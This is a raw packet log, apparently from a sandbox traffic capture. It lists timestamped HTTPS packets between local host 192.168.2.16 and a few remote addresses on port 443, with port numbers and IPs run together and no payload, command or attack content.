                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.408098936 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.581402063 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.581456900 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.581543922 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.581574917 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.586486101 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.586530924 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.586580992 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.586597919 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.590060949 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.590121984 CET44349801142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.590184927 CET49801443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.591613054 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.591645956 CET44349800142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.591700077 CET49800443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.606251001 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.606283903 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.606367111 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.608208895 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.608220100 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623706102 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623749018 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623776913 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623923063 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623935938 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623976946 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623977900 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.623986959 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.624032974 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.624037981 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.626374006 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.626400948 CET44349802142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:20.626461029 CET49802443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.495744944 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.496073008 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.496100903 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.497162104 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.497245073 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.497509003 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.497566938 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.497659922 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.497669935 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.537130117 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.775955915 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.776000023 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.776160955 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.776228905 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.779652119 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.779706001 CET44349803142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:21.779776096 CET49803443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:23.646658897 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:23.646733999 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:23.646830082 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:23.647139072 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:23.647154093 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.510751009 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.511063099 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.511090040 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512136936 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512208939 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512541056 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512590885 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512696981 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512702942 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512754917 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.512774944 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.566087008 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781606913 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781657934 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781686068 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781727076 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781752110 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781773090 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781801939 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781816006 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.781847954 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.782582998 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.782618046 CET44349804142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.782670021 CET49804443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785075903 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785132885 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785212994 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785378933 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785419941 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785471916 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785612106 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785624981 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785765886 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:24.785778999 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.641390085 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.642083883 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.642134905 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.643223047 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.643330097 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.643654108 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.643721104 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.643946886 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.643956900 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.657074928 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.657346964 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.657377958 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.658442974 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.658534050 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.660240889 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.660319090 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.660384893 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.660398006 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.685102940 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.701096058 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.911906004 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.912072897 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.912228107 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.912297010 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.913002014 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.913053989 CET44349805142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.913140059 CET49805443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.928745031 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.928793907 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.928827047 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.928857088 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.928862095 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.928894043 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.928909063 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.973126888 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.973165989 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.973543882 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.973660946 CET44349806142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.973726988 CET49806443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.976963997 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.977030039 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.977143049 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.977408886 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:25.977425098 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.862329006 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.862737894 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.862762928 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.864130974 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.864197969 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.864653111 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.864866972 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.864880085 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.911338091 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.916057110 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.916075945 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:26.964056015 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.132942915 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.132996082 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133033037 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133061886 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133088112 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133090973 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133116961 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133132935 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133152962 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.133157015 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.134253979 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.134298086 CET44349807142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:27.134356022 CET49807443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:29.386821985 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:29.386858940 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:29.386944056 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:29.387322903 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:29.387334108 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.468297005 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.468393087 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.471821070 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.471833944 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.472152948 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.478703976 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.523329973 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.862656116 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.862684011 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.862700939 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.862802982 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.862827063 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.862879992 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982268095 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982336044 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982465982 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982484102 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982518911 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982605934 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982624054 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982647896 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982661963 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982669115 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982680082 CET49808443192.168.2.164.245.163.56
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:30.982681990 CET443498084.245.163.56192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:32.696546078 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:32.696603060 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:32.696693897 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:32.696934938 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:32.696947098 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.603043079 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.603379011 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.603404045 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.604466915 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.604559898 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.604846001 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.604904890 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.604981899 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.604991913 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.605026007 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.605058908 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.650027037 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890326977 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890381098 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890414953 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890444040 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890476942 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890543938 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890572071 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890613079 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.890625000 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.892168999 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.892230988 CET44349809142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.892306089 CET49809443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.895693064 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.895751953 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.895823002 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.896063089 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.896094084 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.896148920 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.896317959 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.896327972 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.896482944 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:33.896492004 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.749424934 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.749723911 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.749752998 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.750828028 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.750904083 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.751254082 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.751331091 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.751415014 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.751425982 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.768882990 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.769161940 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.769206047 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.770257950 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.770339012 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.770591974 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.770653963 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.770733118 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.770741940 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.794980049 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:34.811047077 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012110949 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012164116 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012192011 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012223005 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012248993 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012275934 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012298107 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012355089 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.012355089 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.013339043 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.013386965 CET44349811142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.013443947 CET49811443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.015769005 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.015829086 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.015929937 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.016139030 CET49812443192.168.2.16142.250.184.196
